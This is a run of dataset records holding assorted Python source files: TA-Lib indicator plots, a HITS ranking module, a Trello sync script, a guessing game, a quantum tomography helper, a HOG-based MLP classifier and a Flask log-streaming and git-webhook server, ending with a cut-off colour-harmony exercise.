df.close, timeperiod=10)\n plt.plot(outATR[start:end])\n plt.legend(['ATR'])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"ATR\")\n plt.show()\n\n\noutATR = ATRtest(df, 500, 1500)\n\n\ndef HT_DCPERIODtest(df, start, end):\n outHT = talib.HT_DCPERIOD(df.close)\n plt.plot(outHT[start:end])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"HT_DCPEIOD\")\n plt.show()\n\n\nHT_DCPERIODtest(df, 500, 1500)\n\n\ndef MACDtest(df, start, end):\n macd, macdsignal, macdhist = talib.MACD(df.close)\n plt.plot(macd[start:end])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"MACD\")\n plt.show()\n\n\nMACDtest(df, 500, 1500)\n\n\ndef CCItest(df, start, end):\n real = talib.CCI(df.high, df.low, df.close, timeperiod=24)\n plt.plot(real[start:end])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"CCI\")\n plt.show()\n\n\nCCItest(df, 500, 1500)\n\n\ndef RSItest(df, start, end):\n real = talib.RSI(df.high, timeperiod=14)\n 
plt.plot(real[start:end])\n plt.twinx()\n plt.plot(df.close[start:end], color=\"orange\")\n plt.legend(['close'])\n plt.title(\"RSI\")\n plt.show()\n\n\nRSItest(df, 500, 1500)\n","sub_path":"scripts/冲击均线模型.py","file_name":"冲击均线模型.py","file_ext":"py","file_size_in_byte":7474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"58197302","text":"import glob\nimport os\n\nimport requests\nimport math\n\nurlMap = dict()\nurlMapId = dict()\nadjList = dict()\ncwd = os.getcwd()\n\n\ndef get_url_map():\n file_path = cwd + \"/Climate_App/hits/urlMap\"\n file = open(file_path, \"r\")\n for urlReads in file:\n urlDetails = urlReads[1:].split('=')\n if(len(urlDetails) > 1):\n urlMap[urlDetails[0].strip()] = urlDetails[1].replace('\\n', '')\n urlMapId[urlDetails[1].replace('\\n', '')] = urlDetails[0].strip()\n\ndef get_adj_lis():\n file_path = cwd + \"/Climate_App/hits/adjList\"\n file = open(file_path, \"r\")\n for urlArray in file:\n arrayList = urlArray[1:].split('=')\n if(len(arrayList) > 1):\n arrayList[1] = arrayList[1].replace('\\n', '')\n adjList[arrayList[0]] = arrayList[1].split(' ')\n\ndef add_to_map(map, key, val):\n if(map.get(urlMap[key])):\n map.get(urlMap[key]).append(urlMap[val])\n else:\n map[urlMap[key]] = [urlMap[val]]\n return map\n\ndef make_graph(inlinks, outlinks):\n global adjList\n for key in adjList:\n url_list = adjList[key]\n for url in url_list:\n outlinks = add_to_map(outlinks, key.strip(), url.strip())\n inlinks = add_to_map(inlinks, url.strip(), key.strip())\n return inlinks, outlinks\n\ndef get_query(results):\n global urlMap\n jsonMap = dict()\n input_urls_id = list()\n input_urls = list()\n docs = results['response']['docs']\n doc_len = min(len(docs), 10)\n for i in range(0, doc_len):\n jsonMap[docs[i]['url']] = docs[i]\n input_urls.append(docs[i]['url'])\n\n for url in input_urls:\n if(urlMap.get(url)):\n id = urlMap[url]\n input_urls_id.append(id)\n return input_urls_id, jsonMap\n\n\ndef initalize_ranking(union_url_ids):\n hub_score, auth_score = dict(), dict()\n for key in union_url_ids:\n hub_score[key] = 1\n auth_score[key] = 1\n return hub_score, auth_score\n\ndef isConverged(new_rank, old_rank):\n converged = True\n tolerance = 0.01\n for key in new_rank:\n a=(new_rank[key])\n c=a-(old_rank[key])\n if ((abs(c)) > (tolerance)):\n converged = False\n break\n return converged\n\ndef compute_score(hub_score, auth_score, inlinks, outlinks, union_url_ids):\n newAuthRank = calcAuthscore(hub_score, auth_score, inlinks, union_url_ids)\n calcHubScore(hub_score, auth_score, outlinks, union_url_ids)\n while not isConverged(newAuthRank, auth_score):\n newAuthRank = calcAuthscore(hub_score, auth_score, inlinks, union_url_ids)\n newHubRank = calcHubScore(hub_score, auth_score, outlinks, union_url_ids)\n hub_score = newHubRank\n auth_score = newAuthRank\n\n\n\ndef calcHubScore(hub_score, auth_score, outlinks, union_url_ids):\n temp_rank = dict()\n norm = 0\n for key in hub_score:\n temp_rank[key] = 0.0\n if(outlinks.get(key) != None):\n tempList = outlinks[key]\n else:\n continue\n hubScore = 0.0\n for dest in tempList:\n if (dest in union_url_ids):\n hubScore += auth_score[dest]\n norm += math.pow(hubScore, 2)\n temp_rank[key] = hubScore\n norm = math.sqrt(norm)\n for key in temp_rank:\n temp_rank[key] = temp_rank[key] / norm\n\n return temp_rank\n\ndef calcAuthscore(hub_score, auth_score, inlinks, union_url_ids):\n temp_rank = dict()\n norm = 0\n for key in auth_score:\n temp_rank[key] = 0.0\n if(inlinks.get(key) != 
None):\n            tempList = inlinks[key]\n        else:\n            continue\n        authScore = 0.0\n        for dest in tempList:\n            if (dest in union_url_ids):\n                authScore += hub_score[dest]\n        norm += math.pow(authScore, 2)\n        temp_rank[key] = authScore\n    norm = math.sqrt(norm)\n    for key in temp_rank:\n        temp_rank[key] = temp_rank[key] / norm\n    return temp_rank\n\ndef get_hits(results):\n    input_urls_id, jsonMap = get_query(results)\n    inlinks, outlinks = dict(), dict()\n    inlinks, outlinks = make_graph(inlinks, outlinks)\n    union_url_ids = list()\n    required_auth_score = dict()\n    sorted_auth_score = dict()\n\n    for key in input_urls_id:\n        if key is None:\n            continue\n        union_url_ids.append(key)\n        outs = outlinks.get(key)\n        if outs is not None:\n            for i in range(0, len(outs)):\n                union_url_ids.append(outs[i])\n\n        ins = inlinks.get(key)\n        if ins is not None:\n            for i in range(0, len(ins)):\n                union_url_ids.append(ins[i])\n\n    hub_score, auth_score = initalize_ranking(union_url_ids)\n\n    compute_score(hub_score, auth_score, inlinks, outlinks, union_url_ids)\n    response = []\n    for id in input_urls_id:\n        score = auth_score[id]\n        required_auth_score[id] = score\n    for k in sorted(required_auth_score, key=required_auth_score.__getitem__, reverse=True):\n        sorted_auth_score[k] = required_auth_score[k]\n    for key in sorted_auth_score:\n        url = urlMapId[key]\n        response.append(jsonMap[url])\n\n    return response\n\n\n","sub_path":"IR_Climate/Climate_App/hits/hits.py","file_name":"hits.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"405901630","text":"def fll(aList):\n    ''' \n    aList: a list \n    Returns a copy of aList, which is a flattened version of aList \n    '''\n    r = []\n    for i in aList:\n        if isinstance(i, list):\n            r += fll(i)\n        else:\n            r.append(i)\n    return r\n    \n#fll([[1,'a',['cat'],2],[[[3]],'dog'],4,5])","sub_path":"6.00.1x/fllaten a list.py","file_name":"fllaten a list.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"331580050","text":"#!/usr/bin/env python3\n\nfrom app.collector import TrelloCollector\nfrom app.CFtoBoard import CFtoBoard\n\nimport logging\nimport os\nimport yaml\nimport argparse\n\n\ndef main():\n    logging_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n    logging.basicConfig(format=logging_format,\n                        level=logging.INFO)\n\n    logger = logging.getLogger(__name__)\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--config', help='report config',\n                        default=\"config/cfsync.yml\")\n    parser.add_argument('--parent', help='parent card')\n    parser.add_argument('action', nargs='?',\n                        help='list to list custom fields,'\n                             'sync_cf to sync downstream',\n                        default=\"sync_cf\")\n    args = parser.parse_args()\n\n    if os.path.isfile(args.config):\n        with open(args.config, 'r') as stream:\n            report_config = yaml.load(stream)\n    else:\n        logger.error('Invalid configuration file!')\n        return\n\n    with open(\"secrets/trello_secret.yml\", 'r') as stream:\n        trello_secret_config = yaml.load(stream)\n\n    collector = TrelloCollector(report_config, trello_secret_config)\n    logger.info('Started querying of Trello {}'.format(collector))\n\n    if args.action == 'list':\n        collector.list_boards() # output list of Trello boards and lists\n        return\n    elif args.action == 'list_parents':\n        collector.print_cards(collector.parent_cards_generator(), \"Parent\")\n#        for card in collector.parent_cards_generator():\n#            logger.info(\"Parent card: {}\".format(card))\n    elif args.action == 'list_all_children':\n        collector.print_cards(collector.all_children_card_generator(), \"Child\")\n    elif args.action == 'sync_cf':\n        cf_list = collector.list_cf()\n        for cf_val in cf_list:\n            logger.info(\"Custom field name: {}\".format(cf_val['name']))\n            for board in collector.target_board_generator():\n                cf_to_board = CFtoBoard(cf_val['name'], cf_val['values'],\n                                        board)\n                cf_to_board.check_and_add_board_cf()\n        return\n    else:\n        logger.error('Unrecognized action %s' % (args.action))\n        return\n\n\nif __name__ == '__main__':\n\n    main()\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"169244927","text":"# !/usr/bin/env python3\r\n\r\nimport random\r\n\r\nprevcat = 0\r\nprevdiff = 0\r\n\r\ndef getGuess():\r\n    #final version: must validate input as 0 to 100 and not crash on illegal input\r\n    # and loop until correct input\r\n    g = -1\r\n    while g < 0 or g > 100:\r\n        try:\r\n            g = int(input(\"Your Guess? (0=quit): \"))\r\n            if g < 0 or g > 100:\r\n                print(\"Numbers between 0 and 100 only. \")\r\n        except ValueError:\r\n            print(\"Illegal input: numbers from 0 to 100 only\")\r\n    return g\r\n\r\ndef playHighLow(rn):\r\n    print(\"I am thinking of a number from 1 to 100...\" + str(rn))\r\n    gcount = 0\r\n    playing = True #boolean: True or False\r\n    while playing:\r\n        guess = getGuess()\r\n        gcount += 1\r\n        if guess == 0:\r\n            print(\"Sorry, you did not guess my number: \"\r\n                  + str(rn) + \" in \" + str(gcount-1) + \" tries.\")\r\n            playing = False\r\n        elif guess == rn:\r\n            print(\"You guessed it! It took \" + str(gcount) + \" tries.\")\r\n            playing = False\r\n        else:\r\n            showHighLow(rn,guess)\r\n            playing = True \r\n\r\ndef playHotCold(rn):\r\n    print(\"I am thinking of a number from 1 to 100...\" + str(rn))\r\n    gcount = 0\r\n    playing = True #boolean: True or False\r\n    while playing:\r\n        guess = getGuess()\r\n        gcount += 1\r\n        if guess == 0:\r\n            print(\"Sorry, you did not guess my number: \"\r\n                  + str(rn) + \" in \" + str(gcount-1) + \" tries.\")\r\n            playing = False\r\n        elif guess == rn:\r\n            print(\"You guessed it! It took \" + str(gcount) + \" tries.\")\r\n            playing = False\r\n        else:\r\n            showHotCold(rn,guess)\r\n            playing = True\r\n    #end of playHotCold\r\n\r\ndef showHighLow(rn, guess):\r\n    diff = abs(rn - guess) # absolute value of difference\r\n    category = 0\r\n    msg = \"\"\r\n    if guess > rn:\r\n        category = 1\r\n        msg = \"Sorry, that guess is too high\"\r\n    else:\r\n        category = 2\r\n        msg = \"Sorry, that guess is too low\"\r\n\r\n\r\n    print(\"Your guess is: \" + msg) \r\n\r\n    \r\ndef showHotCold(rn, guess):\r\n    global prevcat, prevdiff\r\n    diff = abs(rn - guess) # absolute value of difference\r\n    category = 0\r\n    msg = \"\"\r\n    if diff >= 60:\r\n        category = 1\r\n        msg = \"cold\"\r\n    elif diff >= 30:\r\n        category = 2\r\n        msg = \"warm\"\r\n    elif diff >= 16:\r\n        category = 3\r\n        msg = \"very warm\"\r\n    else:\r\n        category = 4\r\n        msg = \"HOT\"\r\n\r\n    if category == prevcat:\r\n        #add modifier\r\n        if diff == prevdiff:\r\n            msg += \" (same degree)\"\r\n        elif diff > prevdiff:\r\n            msg += \" (getting colder)\"\r\n        else:\r\n            if category == 4:\r\n                msg += \" (getting HOTTER)\"\r\n            else:\r\n                msg += \" (getting warmer)\"\r\n\r\n    print(\"Your guess is: \" + msg)\r\n    prevcat = category #update global variables to 'remember' settings\r\n    prevdiff = diff\r\n    \r\n\r\ndef main():\r\n    print(\"Welcome to the Guessing Game\")\r\n\r\n    gametype = getChoice()\r\n    while gametype != 0:\r\n        rnum = random.randint(1,100)\r\n        if gametype == 1:\r\n            playHotCold(rnum)\r\n        elif gametype == 2:\r\n            playHighLow(rnum)\r\n        else:\r\n            print(\"I do not know that game!\")\r\n        print()\r\n        gametype = getChoice()\r\n    print(\"Thanks for playing!\")\r\n\r\ndef getChoice():\r\n    c = -1\r\n    while c < 0 or c > 2:\r\n        try:\r\n            c = int(input(\"Game type: 1=Hot/Cold, 2=High/Low, 0=Quit): \"))\r\n            if c < 0 or c > 2:\r\n                print(\"Unknown game type: 0, 1, or 2 only.\")\r\n        except ValueError:\r\n            print(\"Illegal input: integers from 0 to 2 only\")\r\n            c = -1\r\n    return c\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","sub_path":"GuessingGame.py","file_name":"GuessingGame.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"178490840","text":"\"\"\"\r\nHelper methods for single qubit state tomography.\r\n\r\nAuthor: Andrew Cross\r\n\"\"\"\r\nimport copy\r\n\r\n\r\ndef expectation_Z(data, j):\r\n    \"\"\"Compute the expectation value of Z for the jth qubit.\r\n\r\n    The data takes the form {\"bitstring\": count,...}\r\n    \"\"\"\r\n    shots = sum(data.values())\r\n    total = 0.0\r\n    for k, v in data.items():\r\n        total += (-1)**int(k[len(k)-j-1])*float(v)/float(shots)\r\n    return total\r\n\r\n\r\n# Measurement instruction\r\nmeas_str = \"measure %s[%d] -> %s[%d];\\n\"\r\n\r\n\r\ndef generate_tomo1_circuits(baseQASM, tomo_qubits,\r\n                            input_qreg='q', input_creg='c'):\r\n    \"\"\"Generate a collection of circuits to implement 1Q state tomography.\r\n\r\n    baseQASM = input QASM source file with one input_qreg and one input_creg\r\n    of the same size of the qreg, no measurements, and includes \"qelib1.inc\"\r\n    on line 2.\r\n    tomo_qubits = list of indices of input_qreg for 1Q state tomography\r\n    input_qreg = string containing qreg name\r\n    input_creg = string containing creg name\r\n    \"\"\"\r\n    job = []\r\n    for post_rotation in [['h'], ['sdg', 'h'], []]:\r\n        qasm = {'qasm': copy.copy(baseQASM)}\r\n        for q in tomo_qubits:\r\n            for g in post_rotation:\r\n                qasm['qasm'] += \"%s %s[%d];\\n\" % (g, input_qreg, q)\r\n            qasm['qasm'] += meas_str % (input_qreg, q, 
input_creg, q)\r\n job.append(qasm)\r\n return job\r\n","sub_path":"scripts/qhelpers/tomo1.py","file_name":"tomo1.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"227533185","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport math\nfrom tqdm import trange\nimport random\n\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n\n\n\nif torch.cuda.is_available():\n device = torch.device('cuda')\nelse:\n device = torch.device('cpu')\n\ndef zero_padding(pad_size, img):\n input_y = len(img)\n input_x = len(img[0])\n output = np.zeros((input_y + 2 * pad_size, input_x + 2 * pad_size))\n for y in range(input_y + 2 * pad_size):\n for x in range(input_x + 2 * pad_size):\n if pad_size <= y < (input_y + pad_size) and pad_size <= x < (input_x + pad_size): \n output[y][x] = img[y-pad_size][x-pad_size]\n return output\n\ndef set_histogram(mag, ang):\n hist = np.zeros(shape = 10, dtype = float)\n for cnt in range(9):\n idx = np.where(ang < (cnt + 1) * 20)\n tmp2 = (ang[idx] - cnt * 20)/((cnt + 1) * 20)\n tmp1 = 1 - tmp2\n tmp2 *= mag[idx] \n tmp1 *= mag[idx]\n hist[cnt] += np.sum(tmp1)\n hist[cnt+1] += np.sum(tmp2)\n ang[idx] = 300\n hist[0] += hist[9]\n return hist[:9]\n\ndef hist_normalize(histogram, bat_h,bat_w):\n \n hist_h, hist_w, ang_num = histogram.shape\n ## 8,8,9\n # histogram = list(histogram)\n # output = np.zeros(shape = (hist_h - bat_h + 1,hist_w - bat_w + 1))\n output = []\n ## 7, 7\n batch = np.zeros(shape = (bat_h,bat_w,ang_num))\n batch_sum = np.zeros(shape = ())\n \n ## 2, 2\n for h in range(hist_h - bat_h + 1): # 7\n for w in range(hist_w - bat_w + 1): # 7\n batch = histogram[h:h+bat_h,w:w+bat_w,:]\n batch = batch.reshape((bat_h * bat_w,ang_num))\n batch_sum = batch[0] + batch[1] + batch[2] + batch[3]\n batch_sum = batch_sum / np.linalg.norm(batch_sum, axis = -1, ord = 2)\n output.append(batch_sum)\n \n output = np.array(output)\n return output\n\n\n\n\n\ndef plot_hist(hist):\n ## shape = [49][9] \n cell_num, angs = hist.shape\n # hist[0] 먼저 plot\n\n cnt = 0\n # shape = [9]\n # plt.figure(figsize = (20,20))\n fig, ax = plt.subplots(nrows = 7, ncols = 7, sharex = True, sharey = True, figsize = (10,10))\n for h in range(7):\n for w in range(7):\n for idx, val in enumerate(hist[cnt]):\n x = np.linspace(-2, 2,50)\n\n if val > 0.2:\n line = ax[h][w].plot(x, np.tan((idx * 20 + 90) * np.pi / 180) * x)\n \n plt.setp(line, color = 'r', linewidth = 2.0 * val )\n ax[h][w].axis('off')\n plt.xlim(-2,2)\n plt.ylim(-2,2)\n\n cnt += 1\n plt.show()\n \n\nclass Gradient():\n def __init__(self,input,pad,stride = 1,filter = \"sobel\"):\n if filter == \"sobel\":\n self.filter_x = np.array([[-1,0,1],\n [-2,0,2],\n [-1,0,1]]\n )\n self.filter_y = np.array([[1,2,1],\n [0,0,0],\n [-1,-2,-1]]\n )\n self.fil_size = 3\n self.pad = pad\n self.input = input\n self.stride = stride\n self.in_x = len(self.input[0])\n self.in_y = len(self.input)\n self.grad_x = np.zeros(shape = (int(math.floor((self.in_y + 2 * self.pad - self.fil_size)/self.stride) + 1),\n int(math.floor((self.in_x + 2 * self.pad - self.fil_size)/self.stride) + 1)\n ))\n self.grad_y = np.zeros_like(self.grad_x)\n \n \n\n def set_grad(self,img):\n\n for idx_h,h in enumerate(list(range(0, self.in_y - self.fil_size + 2 * self.pad + 1, self.stride))):\n for idx_w,w in enumerate(list(range(0, self.in_x - self.fil_size + 2 * self.pad + 1, self.stride))):\n\n self.grad_x[idx_h][idx_w] = np.sum(img[h:h+3,w:w+3] * 
self.filter_x)\n self.grad_y[idx_h][idx_w] = np.sum(img[h:h+3,w:w+3] * self.filter_y) \n return self.grad_x,self.grad_y\n def set_grad_mag(self):\n grad_mag = np.power((np.power(self.grad_x,2) + np.power(self.grad_y,2)),1/2)\n return grad_mag\n \n def set_grad_ang(self):\n grad_ang = np.abs(np.arctan2(self.grad_y,self.grad_x+0.00000001))/np.pi*180\n return grad_ang\n def auto(self):\n # for y in range(int(self.in_y/self.bat_y)):\n # for x in range(int(self.in_x/self.bat_x)):\n # img = input[y * self.bat_y: (y+1) * self.bat_y,x * self.bat_x: (x+1) * self.bat_x]\n # # img = zero_padding(2,img)\n # self.set_grad(img)\n # self.grad_mag = self.set_grad_mag()\n # self.grad_ang = self.set_grad_ang()\n # self.histogram.append(set_histogram(self.grad_mag,self.grad_ang))\n # self.histogram = np.array(self.histogram)\n # self.histogram = self.histogram.reshape((int(self.in_y/self.bat_y), int(self.in_x/self.bat_x),9))\n # return self.histogram\n img = self.input\n self.set_grad(img)\n self.grad_mag = self.set_grad_mag()\n self.grad_ang = self.set_grad_ang()\n return self.grad_mag, self.grad_ang\n \n\n#%% \n \n\ndata_x = np.load('./Sign-language-digits-dataset/X.npy')\ndata_y = np.load('./Sign-language-digits-dataset/Y.npy')\nshuffle_idx = np.arange(data_x.shape[0])\nnp.random.shuffle(shuffle_idx)\n\ndata_x = data_x[shuffle_idx]\ndata_y = data_y[shuffle_idx]\n\n\n\ndata_y = np.argmax(data_y, axis = 1)\ndata_y = torch.tensor(data_y, dtype = torch.long).view(-1,1)\n\nprint(\"1\",data_y.shape)\n# grad_mag_list = []\n# grad_ang_list = []\n\ngrad_mag_list = np.zeros(shape = (2062,62,62))\ngrad_ang_list = np.zeros(shape = (2062,62,62))\n\n#%%\n\n\n\npadding = 0\nstride = 1\nbatch = (8,8)\nfor idx,img in enumerate(data_x):\n grad = Gradient(input = img, pad = padding, stride = stride)\n grad_mag, grad_ang = grad.auto()\n grad_mag_list[idx] = grad_mag\n grad_ang_list[idx] = grad_ang\n if idx % 100 == 0:\n print(idx)\n\n\n\n \ngrad_mag_list = torch.tensor(grad_mag_list,dtype = torch.float).view(-1,62 * 62)\ngrad_ang_list = torch.tensor(grad_ang_list,dtype = torch.float).view(-1,62 * 62)\n\n\n \n\n\n\n\n# fig, ax = plt.subplots(2,1,figsize = (20,20))\n\n# ax[0].imshow(grad_mag,'gray')\n# ax[1].imshow(grad_ang,'gray') \n \n \n \n \n#%%\nclass Hog_MLP(nn.Module):\n def __init__(self, p):\n super(Hog_MLP, self).__init__()\n self.model = nn.Sequential(\n # nn.Dropout(p = p),\n nn.Linear(62 * 62,256),\n nn.ReLU(),\n # nn.Dropout(p = p),\n nn.Linear(256,64),\n nn.ReLU(),\n\n nn.Linear(64,10),\n nn.LogSoftmax(dim = -1)\n )\n\n \n \n \n def forward(self, x):\n x = self.model(x)\n\n return x\nepochs = 30\n\nlr = 0.001\ncnt = 0\nloss_list = []\nval_acc_list = []\n\nmodel = Hog_MLP(p = 0).to(device)\ncriterion = nn.NLLLoss()\noptimizer = optim.Adam(model.parameters(),lr = lr)\n\ntrain_x = grad_ang_list[ :1800] \ntest_x = grad_ang_list[1800: ]\ntrain_y = data_y[:1800,: ]\ntest_y = data_y[1800: ,: ]\n\n\n\n\n\nfor epoch in trange(epochs):\n model.train()\n loss_epoch = 0\n for step, img in enumerate(train_x):\n\n \n img = img.view(-1,62*62).to(device)\n label = train_y[step].to(device)\n\n pred = model(img)\n optimizer.zero_grad()\n\n loss = criterion(pred,label)\n loss_epoch += loss.item() * pred.shape[0]\n loss.backward()\n optimizer.step()\n loss_epoch /= len(train_x)\n loss_list.append(loss_epoch)\n \n \n model.eval()\n val_acc = 0\n \n for step, img in enumerate(test_x):\n img = img.view(-1,62*62).to(device)\n label = test_y[step].to(device)\n \n pred = model(img)\n topv, topi = pred.topk(1, dim = 1)\n n_correct = 
(topi.view(-1) == label).type(torch.int)\n val_acc += n_correct.sum().item()\n val_acc /= len(test_x)\n val_acc_list.append(val_acc)\n print(epoch, loss_epoch, val_acc)\n\n \n#%%\n \nfig, ax = plt.subplots(2, 1, figsize = (30, 15))\nax[0].plot(loss_list)\nax[1].plot(val_acc_list)\n\n\n","sub_path":"code/hog/Grad_Ang_MLP.py","file_name":"Grad_Ang_MLP.py","file_ext":"py","file_size_in_byte":8347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"94612654","text":"from mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom funcs import *\nimport numpy as np\n\n#if using termux\nimport subprocess\nimport shlex\n#end if\n\n#creating x,y for 3D plotting\nxx, yy = np.meshgrid(range(10), range(10))\n#setting up plot\nfig = plt.figure()\nax = fig.add_subplot(111,projection='3d',aspect='equal')\n\n#defining direction vectors of planes\nl1 = np.array([1,1,0])\nl2 = np.array([-3,5,7])\n\n#finding cross product\ncp = np.cross(l1,l2)\n\n#plotting lines\nplt.plot([0,l1[0]],[0,l1[1]],[0,l1[2]],label=\"Direction Vector of L1\")\nplt.plot([0,l2[0]],[0,l2[1]],[0,l2[2]],label=\"Direction Vector of L2\")\nplt.plot([0,cp[0]],[0,cp[1]],[0,cp[2]],label=\"Cross Product Vector\")\n\n#printing direction vectors\nprint(\"Direction Vector of L1=\",l1)\nprint(\"Direction Vector of L2=\",l2)\nprint(\"Cross Product= \\n\",cp)\n\n#show plot\nplt.xlabel('$x$');plt.ylabel('$y$')\nplt.legend(loc='best');plt.grid()\n#if using termux\nplt.savefig('../figs/2.1.pdf')\nplt.savefig('../figs/2.1.eps')\nsubprocess.run(shlex.split(\"termux-open ../figs/2.1.pdf\"))\n#else\n#plt.show()\n\n\t\n\n","sub_path":"jee/linalg/codes/3d/2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"335687197","text":"\nimport os\nimport threading\nimport json\nimport datetime\nimport time\nimport pprint\nimport logging\nimport subprocess\n\nfrom flask import Flask, g, request, render_template\nfrom flask_sockets import Sockets\nimport git\n\nLOG_LOCK = threading.Lock()\n\napp = Flask(__name__)\napp.debug = True\nsockets = Sockets(app)\n\n\napp.logger.debug(\"Reloaded\")\n\n\n@app.route('/')\ndef main():\n return render_template(\"index.html\")\n\n\n@app.route('/test')\ndef testit():\n return \"done\"\n\n\n@app.route('/trigger_samples//')\ndef trigger_samples(repo, path_and_class):\n write_log(\"Triggered samples for {}: {}\".format(repo, path_and_class))\n path = \"/\".join(path_and_class.split(\"/\")[:-1])\n class_ = path_and_class.split(\"/\")[-1]\n pipe = subprocess.Popen(\n [\n \"java\",\n \"-cp\", \"libs/*:\" + repo + \"/\" + path,\n class_,\n \"../dimple.json\"\n ],\n cwd=\"build\"\n )\n write_log(\"Running samples: pid={}\".format(pipe.pid))\n pid = pipe.wait()\n write_log(\"Finished writing samples: returncode={}\".format(pipe.returncode))\n return \"Good work\"\n\n\n@app.route('/debug', methods=[\"GET\", \"PUT\", \"POST\", \"DELETE\"])\ndef debug():\n app.logger.debug(request.headers)\n app.logger.debug(request.args)\n app.logger.debug(request.data)\n return ''.join([\n pprint.pformat(request.headers),\n #pprint.pformat(request.body)\n ])\n\n\ndef write_log(message):\n app.logger.debug(\"JSON log: {}\".format(message))\n json_message = {\n \"timestamp\": str(datetime.datetime.now()),\n \"message\": message\n }\n LOG_LOCK.acquire(True)\n try:\n log_file = open(\"log.json\", \"a\")\n log_file.write(json.dumps(json_message))\n log_file.write(\"\\n\")\n 
log_file.close()\n finally:\n LOG_LOCK.release()\n\n\ndef follow(file_):\n lineCount = 0\n file_.seek(0, 2)\n while True:\n line = file_.readline()\n try:\n data = json.loads(line)\n data['i'] = lineCount\n lineCount += 1\n yield json.dumps(data)\n except ValueError:\n time.sleep(0.1)\n continue\n\n\ndef batch_follow(file_, limit=None):\n lineCount = 0\n file_.seek(0, 2)\n prev_line = \"\"\n while True:\n lines = []\n done = False\n while not done and limit is not None and len(lines) < limit:\n try:\n line = prev_line + file_.readline()\n data = json.loads(line)\n #app.logger.debug(\"{}: {}\".format(lineCount, line))\n data['i'] = lineCount\n lineCount += 1\n lines.append(data)\n #prev_line = \"\"\n #line = file_.readline()\n except ValueError:\n #prev_line = line\n done = True\n if len(lines) > 0:\n yield json.dumps(lines)\n lines = []\n time.sleep(0.1)\n\n\ndef tail(file_, limit=10):\n lines = file_.readlines()\n app.logger.debug(lines[-limit:])\n for line in lines[-limit:]:\n try:\n json.loads(line)\n yield line\n except ValueError:\n continue\n\n\n@sockets.route('/watch_log')\ndef watch_log(ws):\n write_log(\"Starting to watch log\")\n\n log_file = open(\"log.json\", \"r\")\n\n # First, return the latest 10 entries\n for sample in tail(log_file, 10):\n ws.send(sample)\n\n # Second, start returning real-time\n for sample in follow(log_file):\n ws.send(sample)\n\n\n@app.route('/ping_log')\ndef ping_log():\n write_log(\"PING\")\n return \"Done\"\n\n\n@app.route('/git-push', methods=[\"POST\"])\ndef git_push():\n repo_name = request.json['repository']['name']\n write_log(\"Github PUSH event: {}\".format(repo_name))\n repo = git.Repo(os.path.join(\"repos\", repo_name))\n origin = repo.remotes.origin\n origin.pull()\n write_log(\"Updated {} to commit={}\".format(\n repo_name,\n origin.refs.HEAD.ref.object.hexsha))\n return \"Hi Github\"\n\n\n@sockets.route('/sampler')\ndef batch_sample(ws):\n sample_file = open(\"dimple.json\", \"a\")\n sample_file.close();\n\n sample_file = open(\"dimple.json\", \"r\")\n for samples in batch_follow(sample_file, limit=10):\n ws.send(samples)\n #for samples in batch_follow(file(\"samples\"), limit=10):\n # ws.send(samples)\n\n\n@app.route('/monitor')\ndef monitor():\n return \"Base monitor\"\n\n\n@app.route('/monitor/')\ndef monitor_repo(repo):\n return \"Monitoring {}\".format(repo)\n\n\n@app.route('/monitor//')\ndef monitor_repo_commit(repo, commit):\n return \"Monitoring {}, commit={}\".format(repo, commit)\n\n\n@app.route('/monitor///')\ndef monitor_repo_commit_model(repo, commit, model):\n return \"Monitoring {}, commit={}, model={}\".format(repo, commit, model)\n\n\n@app.route('/monitor//')\ndef monitor_repo_model(repo, model):\n return \"Monitoring {}, model={}\".format(repo, model)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"385763285","text":"\"\"\"\r\n\n\nIn colour theory, colour _harmony_ refers to an aesthetically pleasing\ncombination of colours. The standard colour wheel shows the 12 primary,\nsecondary and tertiary colours. Starting with _red_ , and moving clockwise,\nthe colours are:\n\n colours = [\"red\", \"red-orange\", \"orange\", \"yellow-orange\", \"yellow\", \"yellow-green\", \"green\", \"blue-green\", \"blue\", \"blue-violet\", \"violet\", \"red-violet\"]\n\nWith an initial colour (called the **anchor** ), you can find combinations of\nharmonious colours. 
